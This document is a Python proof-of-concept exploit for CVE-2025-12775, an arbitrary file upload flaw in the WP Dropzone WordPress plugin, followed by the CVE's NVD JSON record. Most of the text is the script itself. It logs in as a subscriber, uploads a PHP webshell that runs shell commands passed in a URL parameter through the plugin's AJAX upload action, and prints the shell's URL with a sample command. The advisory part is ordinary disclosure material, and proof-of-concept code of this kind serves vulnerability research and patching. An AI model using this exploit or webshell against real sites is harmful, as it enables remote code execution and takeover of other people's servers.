CVE-2025-12775

#!/usr/bin/env python3 """ CVE-2025-12775 PoC - WP Dropzone Arbitrary File Upload This PoC demonstrates uploading a PHP webshell via the vulnerable endpoint. """ import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "attacker123" def get_nonce(wordpress_url, username, password): """Login to WordPress and extract nonce and cookies""" session = requests.Session() # Get login page to extract nonce login_url = f"{wordpress_url}/wp-login.php" resp = session.get(login_url) # Extract login nonce import re nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', resp.text) if not nonce_match: print("[-] Failed to extract nonce") return None, None nonce = nonce_match.group(1) # Login login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "_wpnonce": nonce, "redirect_to": "/wp-admin/" } resp = session.post(login_url, data=login_data, allow_redirects=True) if "wordpress_logged_in" in str(session.cookies): print("[+] Login successful") return session.cookies, session else: print("[-] Login failed") return None, None def upload_shell(session, wordpress_url): """Upload malicious PHP file via vulnerable endpoint""" upload_url = f"{wordpress_url}/wp-admin/admin-ajax.php" # PHP webshell content webshell = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Chunked upload parameters files = { "file": ("shell.php", webshell, "application/x-php") } data = { "action": "dropzone_upload", "chunk": "0", "chunks": "1", "file_id": "malicious_shell" } print("[*] Uploading malicious PHP file...") resp = session.post(upload_url, files=files, data=data) if resp.status_code == 200: print("[+] File uploaded successfully") print(f"[*] Try accessing: {wordpress_url}/wp-content/uploads/dropzone/malicious_shell.php?cmd=whoami") else: print(f"[-] Upload failed: {resp.status_code}") print(resp.text) if __name__ == "__main__": cookies, session = get_nonce(TARGET_URL, USERNAME, PASSWORD) if cookies: upload_shell(session, TARGET_URL)

{"cve": {"id": "CVE-2025-12775", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:48.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Dropzone plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 1.1.0 via the `ajax_upload_handle` function. This is due to the chunked upload functionality writing files directly to the uploads directory before any file type validation occurs. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L127", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395966%40wp-dropzone&new=3395966%40wp-dropzone&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7aeb7-2c6f-4b23-b8b1-52fb010e5aac?source=cve", "source": "[email protected]"}]}}